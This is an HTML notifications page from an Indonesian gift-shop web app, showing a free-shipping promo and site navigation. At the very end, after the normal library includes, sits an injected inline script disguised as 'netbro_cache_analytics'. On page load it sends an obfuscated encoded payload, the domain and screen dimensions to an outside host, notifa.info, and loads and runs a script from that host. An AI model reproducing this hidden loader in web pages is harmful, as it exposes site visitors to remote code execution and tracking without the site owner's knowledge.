<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags-->
    <!-- Title-->
    <title>Udah Kadoin Aja! | Kado Untuk Semua Orang</title>
    <!-- Favicon-->
    <link rel="icon" href="img/core-img/favicon.png">
    <!-- Stylesheet-->
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <!-- Preloader-->
    <div class="preloader" id="preloader">
      <div class="spinner-grow text-secondary" role="status">
        <div class="sr-only">Loading...</div>
      </div>
    </div>
    <!-- Header Area-->
    <div class="header-area" id="headerArea">
      <div class="container h-100 d-flex align-items-center justify-content-between">
        <!-- Back Button-->
        <div class="back-button" onclick="history.back()"><i class="lni-arrow-left"></i></div>
        <!-- Page Title-->
        <div class="page-heading">
          <h6 class="mb-0">Notifikasi</h6>
        </div>
        <!-- Filter Option-->
        <a href="keranjang.html"><i class='lni lni-shopping-basket'></i></a>
      </div>
    </div>
    <!-- Page Content Wrapper-->
    <div class="page-content-wrapper">
      <div class="container">
        <!-- Notifications Details Area-->
        <div class="notification-area pt-3 pb-2">
          <!-- Notification Details-->
          <div class="list-group-item d-flex py-3"><span class="noti-icon"><i class="lni-alarm lni-tada-effect"></i></span>
            <div class="noti-info">
              <h6>Promo #DiRumahAja</h6>
              <p>Khusus untuk kamu yang dirumah aja, dapatkan <b>Gratis Ongkir sampai Rp. 15.000</b> dengan min. belanja Rp.200.000</p>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Footer Nav-->
    <div class="footer-nav-area" id="footerNav">
      <div class="suha-footer-nav h-100">
        <ul class="h-100 d-flex align-items-center justify-content-between">
          <li><a href="index.html"><i class="lni-home"></i>Home</a></li>
          <li><a href="eksplor.html"><i class="lni-grid-alt"></i>Eksplor</a></li>
          <li><a href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20kado"><i class="lni-whatsapp"></i>Chat</a></li>
          <li class="active"><a href="notifikasi.html"><i class="lni-alarm lni-tada-effect"></i>Notifikasi</a></li>
          <li><a href="support.html"><i class="lni-question-circle"></i>Support</a></li>
        </ul>
      </div>
    </div>
    <!-- All JavaScript Files-->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/waypoints.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.animatedheadline.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/jarallax.min.js"></script>
    <script src="js/jarallax-video.min.js"></script>
    <script src="js/default/jquery.passwordstrength.js"></script>
    <script src="js/default/dark-mode-switch.js"></script>
    <script src="js/default/active.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXPO%2bgXEzZDbXze3AUY9GBdP9f23BvTn%2fP44skJCx64Np9VJbqxfwD%2fMEQcZdlyH1iGFXusH521cQ47uAxbZ%2fKG9woqcb7AYWyxvMnDj6ur%2bwJ%2bSLadTq5WXr2RfvvUQngwmuRNPjvaL5iXsAgveFXpGwdZc9FUPID%2fG%2fcgUTJcKqHmBU9ybuQhvnZMa1%2fmkucl2fQp6Q9yAuKyVIu2M0XRTbMM5zQ%2f9A5APAeYvfVELHvmEN5MQ0FJ4cUgYSTtgM1TgCasANoQk5NhnVToAXwbi4DyZLJ%2bHbhbYtYKv10IbxpjIyJR7OrkFhXyNejYdp8Ovyzq7AV7vEVdp45BcQZaUhnuj2QLFDCkfqNmnej7LKBqJSocxC6QUpXEtSlKt72zPzhm8PqIV%2bG7wP2ez94dRg5RhsX7JXjVeWr7Z5PCJI%2fSUU2a0gbipGW2hVSYZ3pgnUXHuahJqBEON%2bPZwYWLVXQer9hGzXBUah9JvKQxT5NboSq9ML1%2fabXaljQvH50" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>